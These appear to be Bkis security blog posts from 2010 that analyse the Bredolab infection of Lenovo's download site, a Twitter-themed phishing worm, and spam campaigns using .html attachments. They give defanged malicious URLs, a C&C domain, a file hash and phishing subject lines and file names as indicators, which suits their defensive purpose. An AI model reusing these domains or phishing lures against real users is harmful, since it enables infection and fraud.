In a recent blog entry, we have posted warning about Lenovo’s download website being infected with malicious codes. According to Lenovo, its download website was infected with malicious codes during the time between late Friday, June 18 and Monday, June 21. After Bkis’ warning, Lenovo has removed malicious code from its website and officially informed users of this issue on its blog.

However, obviously, many users could have accessed these sites during the period from June 18 (when the download site was injected with malicious codes) to June 21 (when this issue was officially handled by Lenovo). Thus, there are many possibilities that such users’ computers have been infected with virus. So, if you visited the download site during this period of time, how could you know your computer has been virus-infected or not? Simply, you can use Window’s msconfig to check your system. If there is a “Startup Item” named “monskc32” in Startup tab, your computer has been infected:

Figure 1: Sign to determine whether your system is infected with Bredolab or not

If your computer is infected with Bredolab, update the latest version of your antivirus software to remove the malicious code.

Le Minh Hung

Senior Security Researcher

Recently, we have several warnings about the risk of being virus infected when users open files attached with phishing emails targeting popular social networking sites such as Facebook or Twitter. However, it seems that users are still indifferent to such warnings. That explains why such infecting methods are still effective for hackers, and new waves of attacks with similar methods are constantly emerging. And this time Twitter is taken advantage.

Figure 1: Phishing emails targeting Twitter.

The ultimate goal of the attacker is to persuade you to believe in these emails, and then trick you into opening the attached file. Of course, without due caution you will easily follow the hacker’s scenario; and as a result, your computer gets infected with virus.

This virus (detected by Bkav as W32. Ziktwitters.Worm) downloads a lot of other malwares including FakeAV and constantly distributes advertising emails as well as phishing emails to other users.

Figure 2: Virus distributes advertising emails and phishing emails.

This virus author seems to be a guy with sense of humor upon choosing a very funny data decryption code :)

Figure 3: Data decryption

Obviously, it is the user’s subjectiveness when receiving the information from the Internet, particularly when opening unknown files without any idea about the emails’ authentication that helps hacker to widely spread virus.

Nguyen Cong Cuong

Senior Malware Researcher

General information

Lenovo’s download site has been infected with malicious codes since Sunday’s afternoon, June 20th; so users should be careful on visiting this site. Currently, if you access this site with Chrome or Firefox, you will see a warning as following:

Chrome’s warning of malicious code on Lenovo’s download site

Many web pages on Lenovo’s download site are appended with an iframe which leads users to hxxp://volgo-marun.cn/pek/index.php

Malicious code appended to web pages

Decoding the iframe, we find many vulnerabilities in Internet Explorer have been taken advantage to launch the attack.

Exploit codes

These exploit codes attempt to load file hxxp://volgo-marun.cn/pek/exe.exe which is a virus, onto victim’s computer.

Virus’ information

The virus is a new variant of Bredolab Botnet with following MD5: F5A44C63F8777F544931ABC763F88EE3

After being loaded onto the computers, the virus copies itself as %Programs%\Startup\monskc32.exe and receives commands from C&C server with domain sicha-linna8.com.

Bredolab Botnet receives commands from C&C server

For the time being, the scan result on Virus Total shows that only 10/40 AVs can detect this virus variant.

http://www.virustotal.com/analisis/a49993e5639068504df90dace96a809b41153fe528751bd6b8f0eef9e4085959-1277144604

Bkav’s users can be worry-free since this virus has already been updated in our antivirus software’s database.

Le Minh Hung

Senior Security Researcher

In the previous blog entry, we mentioned a new trend of spreading malicious code. And in the past few days, our system has constantly collected a lot of new malicious codes spread via emails which masquerade as from big names like Skype, Twitter and Facebook. According to scan result on Virus Total, these .html files have not been detected by many antivirus programs.

Virustotal scan result:

http://www.virustotal.com/analisis/7877f3490e33edab50bea5ad33669d424c5b7777c359a36ee6dcfa6ab9d18be0-1276808217

Even antivirus programs of established mail servers such as Gmail or Yahoo mail are bypassed.

Bypass Gmail’s AV

Bypass Yahoo mail’s AV

That is the reason why these malicious codes are widely spread in the past few days.

Le Minh Hung

Senior Security Researcher

In the last few days, Bkis’ monitoring system has detected a large virus spreading campaign by sending spam emails with .html files attached. The spam emails have masqueraded as notifying messages from Twitter, Facebook or Microsoft, etc.

Fake twitter

Fake facebook

And fake outlook setup notification

The email subjects are varied:

“Reset your Twitter password”
“Reset your Facebook password”
“Outlook Setup Notification”
“FIFA World Cup South Africa… bad news”
..

The attachments can be named as:

news.html
open.html
index.html
ecard.html
facebook_newpass.html
..

The .html files contain the scripts similarly to the following:

Thus, when opening the attachments, users will be redirected to websites containing malicious codes which exploit flaws of Adobe, Java and IE to download viruses onto users’ computers. Opening .html attachments should be considered as accepting the invitations from hackers to visit malicious websites.

This method, is becoming a new dangerous trend, thanks to the following reasons:

1. So far, most viruses spreading via emails use common files as attachments such as .exe file, .zip file or .pif file, etc. Many users have raised awareness with these files. However, with .html files as attachments, most users would think the files are safe.

2. Moreover, .html attachments can bypass antivirus programs integrated in mail servers, because an .html file itself contains no malicious code or exploit code, but a link to a website made by hacker. Thus, it is hardly detected by antivirus programs.

Thus, we would recommend users to raise awareness of any files attached in unknown emails. Also, users should regularly update softwares on their computers and install antivirus programs for virus protection.

Le Minh Hung

Senior Security Researcher